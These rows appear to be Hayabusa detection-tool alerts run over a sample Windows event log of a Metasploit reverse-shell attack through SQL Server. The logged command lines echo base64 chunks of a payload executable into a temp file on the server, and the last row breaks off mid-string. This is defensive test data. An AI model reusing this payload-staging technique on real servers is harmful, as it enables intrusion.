+2020-08-02 07:58:24.510 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo aW9uLCB0aGUgYXR0cmlidXRlcwoAAAAAAAAAICAgICAgICAgICAgICAgICAgICBJbnNlcnRlZCBhZnRlciBhbGwgbm9ybWFsIGhlYWRlciBsaW5lcy4gKHJlcGVhdGFibGUpCgAAAAAAAAAgICAgLUggYXR0cmlidXRlICAgIEFkZCBBcmJpdHJhcnkgaGVhZGVyIGxpbmUsIGVnLiAnQWNjZXB0LUVuY29kaW5nOiBnemlwJwoAAAAAACAgICAtQyBhdHRyaWJ1dGUgICAgQWRkIGNvb2tpZSwgZWcuICdBcGFjaGU9MTIzNC4gKHJlcGVhdGFibGUpCgAgICAgLXogYXR0cmlidXRlcyAgIFN0cmluZyB0byBpbnNlcnQgYXMgdGQgb3IgdGggYXR0cmlidXRlcwoAAAAAICAgIC15IGF0dHJpYnV0ZXMgICBTdHJpbmcgdG8gaW5zZXJ0IGFzIHRyIGF0dHJpYnV0ZXMKAAAgICAgLXggYXR0cmlidXRlcyAgIFN0cmluZyB0byBpbnNlcnQgYXMgdGFibGUgYXR0cmlidXRlcwoAAAAgICAgLWkgICAgICAgICAgICAgIFVzZSBIRUFEIGluc3RlYWQgb2YgR0VUCgAAAAAgICAgLXcgICAgICAgICAgICAgIFByaW50IG91dCByZXN1bHRzIGluIEhUTUwgdGFibGVzCgAAACAgICAtdiB2ZXJib3NpdHkgICAgSG93IG11Y2ggdHJvdWJsZXNob290aW5nIGluZm8gdG8gcHJpbnQKACAgICAgICAgICAgICAgICAgICAgRGVmYXVsdCBpcyAndGV4dC9wbGFpbicKAAAAACAgICAgICAgICAgICAgICAgICAgJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcKAAAAACAgICAtVCBjb250ZW50LXR5cGUgQ29udGVudC10eXBlIGhlYWRlciBmb3IgUE9TVGluZywgZWcuCgAAACAgICAtdSBwdXRmaWxlICAgICAgRmlsZSBjb250YWluaW5nIGRhdGEgdG8gUFVULiBSZW1lbWJlciBhbHNvIHRvIHNldCAtVAoAAAAAAAAAICAgIC1wIHBvc3RmaWxlICAgICBGaWxlIGNvbnRhaW5pbmcgZGF0YSB0byBQT1NULiBSZW1lbWJlciBhbHNvIHRvIHNldCAtVAoAACAgICAtYiB3aW5kb3dzaXplICAgU2l6ZSBvZiBUQ1Agc2VuZC9yZWNlaXZlIGJ1ZmZlciwgaW4gYnl0ZXMKAAAgICAgLXQgdGltZWxpbWl0ICAgIFNlY29uZHMgdG8gbWF4LiB3YWl0IGZvciByZXNwb25zZXMKACAgICAtYyBjb25jdXJyZW5jeSAgTnVtYmVyIG9mIG11bHRpcGxlIHJlcXVlc3RzIHRvIG1ha2UKAAAAACAgICAtbiBy>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe74 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:24.790 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ZXF1ZXN0cyAgICAgTnVtYmVyIG9mIHJlcXVlc3RzIHRvIHBlcmZvcm0KAABPcHRpb25zIGFyZToKAAAAVXNhZ2U6ICVzIFtvcHRpb25zXSBbaHR0cDovL11ob3N0bmFtZVs6cG9ydF0vcGF0aAoAADolZABTU0wgbm90IGNvbXBpbGVkIGluOyBubyBodHRwcyBzdXBwb3J0CgAAaHR0cHM6Ly8AAAAAWyVzXQAAAABodHRwOi8vAGFiOiBDb3VsZCBub3QgcmVhZCBQT1NUIGRhdGEgZmlsZTogJXMKAABhYjogQ291bGQgbm90IGFsbG9jYXRlIFBPU1QgZGF0YSBidWZmZXIKAAAAAGFiOiBDb3VsZCBub3Qgc3RhdCBQT1NUIGRhdGEgZmlsZSAoJXMpOiAlcwoAYWI6IENvdWxkIG5vdCBvcGVuIFBPU1QgZGF0YSBmaWxlICglcyk6ICVzCgBhcHJfZ2xvYmFsX3Bvb2wAJWQuJWQlYwAqKioqAAAAACUzZCVjAAAAJTNkIAAAAAAgIC0gAAAAAEtNR1RQRQAAJXM6IGlsbGVnYWwgb3B0aW9uIC0tICVjCgAAACVzOiBvcHRpb24gcmVxdWlyZXMgYW4gYXJndW1lbnQgLS0gJWMKAABDb21tYW5kTGluZVRvQXJndlcAAGFwcl9pbml0aWFsaXplAAAwMTIzNDU2Nzg5LgAwLjAuMC4wAGJvZ3VzICVwAAAAAEk2NGQAAAAATm8gaG9zdCBkYXRhIG9mIHRoYXQgdHlwZSB3YXMgZm91bmQASG9zdCBub3QgZm91bmQAAEdyYWNlZnVsIHNodXRkb3duIGluIHByb2dyZXNzAAAAV1NBU3RhcnR1cCBub3QgeWV0IGNhbGxlZAAAAFdpbnNvY2sgdmVyc2lvbiBvdXQgb2YgcmFuZ2UAAAAATmV0d29yayBzeXN0ZW0gaXMgdW5hdmFpbGFibGUAAABUb28gbWFueSBsZXZlbHMgb2YgcmVtb3RlIGluIHBhdGgAAABTdGFsZSBORlMgZmlsZSBoYW5kbGUAAABEaXNjIHF1b3RhIGV4Y2VlZGVkAFRvbyBtYW55IHVzZXJzAABUb28gbWFueSBwcm9jZXNzZXMAAERpcmVjdG9yeSBub3QgZW1wdHkATm8gcm91dGUgdG8gaG9zdAAAAABIb3N0IGlzIGRvd24AAAAARmlsZSBuYW1lIHRvbyBsb25nAABUb28gbWFueSBsZXZlbHMgb2Ygc3ltYm9saWMgbGlua3MAAABDb25uZWN0aW9uIHJlZnVzZWQAAENvbm5lY3Rpb24gdGltZWQgb3V0AAAAAFRvbyBtYW55IHJlZmVyZW5jZXMsIGNhbid0IHNwbGljZQAAAENhbid0IHNlbmQgYWZ0ZXIgc29ja2V0IHNodXRkb3duAAAAAFNvY2tldCBpcyBub3QgY29ubmVjdGVk>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x13c4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:25.064 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AFNvY2tldCBpcyBhbHJlYWR5IGNvbm5lY3RlZABObyBidWZmZXIgc3BhY2UgYXZhaWxhYmxlAAAAQ29ubmVjdGlvbiByZXNldCBieSBwZWVyAAAAAFNvZnR3YXJlIGNhdXNlZCBjb25uZWN0aW9uIGFib3J0AAAAAE5ldCBjb25uZWN0aW9uIHJlc2V0AAAAAE5ldHdvcmsgaXMgdW5yZWFjaGFibGUAAE5ldHdvcmsgaXMgZG93bgBDYW4ndCBhc3NpZ24gcmVxdWVzdGVkIGFkZHJlc3MAAEFkZHJlc3MgYWxyZWFkeSBpbiB1c2UAAEFkZHJlc3MgZmFtaWx5IG5vdCBzdXBwb3J0ZWQAAAAAUHJvdG9jb2wgZmFtaWx5IG5vdCBzdXBwb3J0ZWQAAABPcGVyYXRpb24gbm90IHN1cHBvcnRlZCBvbiBzb2NrZXQAAABTb2NrZXQgdHlwZSBub3Qgc3VwcG9ydGVkAAAAUHJvdG9jb2wgbm90IHN1cHBvcnRlZAAAQmFkIHByb3RvY29sIG9wdGlvbgBQcm90b2NvbCB3cm9uZyB0eXBlIGZvciBzb2NrZXQAAE1lc3NhZ2UgdG9vIGxvbmcAAAAARGVzdGluYXRpb24gYWRkcmVzcyByZXF1aXJlZAAAAABTb2NrZXQgb3BlcmF0aW9uIG9uIG5vbi1zb2NrZXQAAE9wZXJhdGlvbiBhbHJlYWR5IGluIHByb2dyZXNzAAAAT3BlcmF0aW9uIG5vdyBpbiBwcm9ncmVzcwAAAE9wZXJhdGlvbiB3b3VsZCBibG9jawAAAFRvbyBtYW55IG9wZW4gc29ja2V0cwAAAEludmFsaWQgYXJndW1lbnQAAAAAQmFkIGFkZHJlc3MAUGVybWlzc2lvbiBkZW5pZWQAAABCYWQgZmlsZSBudW1iZXIASW50ZXJydXB0ZWQgc3lzdGVtIGNhbGwAQVBSIGRvZXMgbm90IHVuZGVyc3RhbmQgdGhpcyBlcnJvciBjb2RlAEVycm9yIHN0cmluZyBub3Qgc3BlY2lmaWVkIHlldAAAcGFzc3dvcmRzIGRvIG5vdCBtYXRjaAAAVGhpcyBmdW5jdGlvbiBoYXMgbm90IGJlZW4gaW1wbGVtZW50ZWQgb24gdGhpcyBwbGF0Zm9ybQAAAAAAVGhlcmUgaXMgbm8gZXJyb3IsIHRoaXMgdmFsdWUgc2lnbmlmaWVzIGFuIGluaXRpYWxpemVkIGVycm9yIGNvZGUAAABTaGFyZWQgbWVtb3J5IGlzIGltcGxlbWVudGVkIHVzaW5nIGEga2V5IHN5c3RlbQBTaGFyZWQgbWVtb3J5IGlzIGltcGxlbWVudGVkIHVzaW5nIGZpbGVzAAAAAFNoYXJlZCBtZW1vcnkgaXMgaW1wbGVtZW50ZWQgYW5vbnltb3VzbHkAAAAAQ291bGQgbm90IGZpbmQgc3Bl>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9e8 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:25.338 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Y2lmaWVkIHNvY2tldCBpbiBwb2xsIGxpc3QuAAAARW5kIG9mIGZpbGUgZm91bmQAAABNaXNzaW5nIHBhcmFtZXRlciBmb3IgdGhlIHNwZWNpZmllZCBjb21tYW5kIGxpbmUgb3B0aW9uAEJhZCBjaGFyYWN0ZXIgc3BlY2lmaWVkIG9uIGNvbW1hbmQgbGluZQBQYXJ0aWFsIHJlc3VsdHMgYXJlIHZhbGlkIGJ1dCBwcm9jZXNzaW5nIGlzIGluY29tcGxldGUAAFRoZSB0aW1lb3V0IHNwZWNpZmllZCBoYXMgZXhwaXJlZAAAAFRoZSBzcGVjaWZpZWQgY2hpbGQgcHJvY2VzcyBpcyBub3QgZG9uZSBleGVjdXRpbmcAAABUaGUgc3BlY2lmaWVkIGNoaWxkIHByb2Nlc3MgaXMgZG9uZSBleGVjdXRpbmcAAABUaGUgc3BlY2lmaWVkIHRocmVhZCBpcyBub3QgZGV0YWNoZWQAAAAAVGhlIHNwZWNpZmllZCB0aHJlYWQgaXMgZGV0YWNoZWQAAAAAAAAAAFlvdXIgY29kZSBqdXN0IGZvcmtlZCwgYW5kIHlvdSBhcmUgY3VycmVudGx5IGV4ZWN1dGluZyBpbiB0aGUgcGFyZW50IHByb2Nlc3MAAAAAWW91ciBjb2RlIGp1c3QgZm9ya2VkLCBhbmQgeW91IGFyZSBjdXJyZW50bHkgZXhlY3V0aW5nIGluIHRoZSBjaGlsZCBwcm9jZXNzAEludGVybmFsIGVycm9yAABUaGUgcHJvY2VzcyBpcyBub3QgcmVjb2duaXplZC4AAFRoZSBnaXZlbiBwYXRoIGNvbnRhaW5lZCB3aWxkY2FyZCBjaGFyYWN0ZXJzAAAAAFRoZSBnaXZlbiBwYXRoIGlzIG1pc2Zvcm1hdHRlZCBvciBjb250YWluZWQgaW52YWxpZCBjaGFyYWN0ZXJzAABUaGUgZ2l2ZW4gcGF0aCB3YXMgYWJvdmUgdGhlIHJvb3QgcGF0aAAAVGhlIGdpdmVuIHBhdGggaXMgaW5jb21wbGV0ZQAAAABUaGUgZ2l2ZW4gcGF0aCBpcyByZWxhdGl2ZQAAVGhlIGdpdmVuIHBhdGggaXMgYWJzb2x1dGUAAFRoZSBzcGVjaWZpZWQgbmV0d29yayBtYXNrIGlzIGludmFsaWQuAABUaGUgc3BlY2lmaWVkIElQIGFkZHJlc3MgaXMgaW52YWxpZC4AAAAARFNPIGxvYWQgZmFpbGVkAE5vIHNoYXJlZCBtZW1vcnkgaXMgY3VycmVudGx5IGF2YWlsYWJsZQBObyB0aHJlYWQga2V5IHN0cnVjdHVyZSB3YXMgcHJvdmlkZWQgYW5kIG9uZSB3YXMgcmVxdWlyZWQuAABObyB0aHJlYWQgd2FzIHByb3ZpZGVkIGFuZCBvbmUgd2FzIHJlcXVpcmVkLgAAAABO>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x113c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:25.618 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo byBzb2NrZXQgd2FzIHByb3ZpZGVkIGFuZCBvbmUgd2FzIHJlcXVpcmVkLgAAAABObyBwb2xsIHN0cnVjdHVyZSB3YXMgcHJvdmlkZWQgYW5kIG9uZSB3YXMgcmVxdWlyZWQuAAAAAE5vIGxvY2sgd2FzIHByb3ZpZGVkIGFuZCBvbmUgd2FzIHJlcXVpcmVkLgAATm8gZGlyZWN0b3J5IHdhcyBwcm92aWRlZCBhbmQgb25lIHdhcyByZXF1aXJlZC4ATm8gdGltZSB3YXMgcHJvdmlkZWQgYW5kIG9uZSB3YXMgcmVxdWlyZWQuAABObyBwcm9jZXNzIHdhcyBwcm92aWRlZCBhbmQgb25lIHdhcyByZXF1aXJlZC4AAABBbiBpbnZhbGlkIHNvY2tldCB3YXMgcmV0dXJuZWQAAEFuIGludmFsaWQgZGF0ZSBoYXMgYmVlbiBwcm92aWRlZAAAAEEgbmV3IHBvb2wgY291bGQgbm90IGJlIGNyZWF0ZWQuAAAAAFVucmVjb2duaXplZCBXaW4zMiBlcnJvciBjb2RlICVkAAAAAFwAXAA/AFwAVQBOAEMAXAAAAAAAXABcAD8AXAAAAAAAQ2FuY2VsSW8AAAAAR2V0Q29tcHJlc3NlZEZpbGVTaXplQQAAR2V0Q29tcHJlc3NlZEZpbGVTaXplVwAAWndRdWVyeUluZm9ybWF0aW9uRmlsZQAAR2V0U2VjdXJpdHlJbmZvAEdldE5hbWVkU2VjdXJpdHlJbmZvQQAAAEdldE5hbWVkU2VjdXJpdHlJbmZvVwAAAFUATgBDAFwAAAAAAEdldEVmZmVjdGl2ZVJpZ2h0c0Zyb21BY2xXAAAAAAAA/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////bnRkbGwuZGxsAAAAc2hlbGwzMgB3czJfMzIAAG1zd3NvY2sAYWR2YXBpMzIAAAAAa2VybmVsMzIAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x568 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:25.896 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x12a4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:26.169 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa30 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:26.444 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEACQQAAEgAAABgUAEAaAcAAAAAAAAAAAAAAAAAAAAAAABoBzQAAABWAFMAXwBW>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x7e4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:26.718 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQACAAIAAAAOAAIAAgAAAA4APwAAAAAAAAAEAAAAAQAAAAAAAAAAAAAAAAAAAMYGAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAAKIGAAABADAANAAwADkAMAA0AGIAMAAAADAEDAIBAEMAbwBtAG0AZQBuAHQAcwAAAEwAaQBjAGUAbgBzAGUAZAAgAHUAbgBkAGUAcgAgAHQAaABlACAAQQBwAGEAYwBoAGUAIABMAGkAYwBlAG4AcwBlACwAIABWAGUAcgBzAGkAbwBuACAAMgAuADAAIAAoAHQAaABlACAAIgBMAGkAYwBlAG4AcwBlACIAKQA7ACAAeQBvAHUAIABtAGEAeQAgAG4AbwB0ACAAdQBzAGUAIAB0AGgAaQBzACAAZgBpAGwAZQAgAGUAeABjAGUAcAB0ACAAaQBuACAAYwBvAG0AcABsAGkAYQBuAGMAZQAgAHcAaQB0AGgAIAB0AGgAZQAgAEwAaQBjAGUAbgBzAGUALgAgAFkAbwB1ACAAbQBhAHkAIABvAGIAdABhAGkAbgAgAGEAIABjAG8AcAB5ACAAbwBmACAAdABoAGUAIABMAGkAYwBlAG4AcwBlACAAYQB0AA0ACgANAAoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGEAcABhAGMAaABlAC4AbwByAGcALwBsAGkAYwBlAG4AcwBlAHMALwBMAEkAQwBFAE4AUwBFAC0AMgAuADAADQAKAA0ACgBVAG4AbABlAHMAcwAgAHIAZQBxAHUAaQByAGUAZAAgAGIAeQAgAGEAcABwAGwAaQBjAGEAYgBsAGUAIABsAGEAdwAgAG8AcgAgAGEAZwByAGUAZQBkACAAdABvACAAaQBuACAAdwByAGkAdABpAG4AZwAsACAAcwBvAGYAdAB3AGEAcgBlACAAZABpAHMAdAByAGkAYgB1AH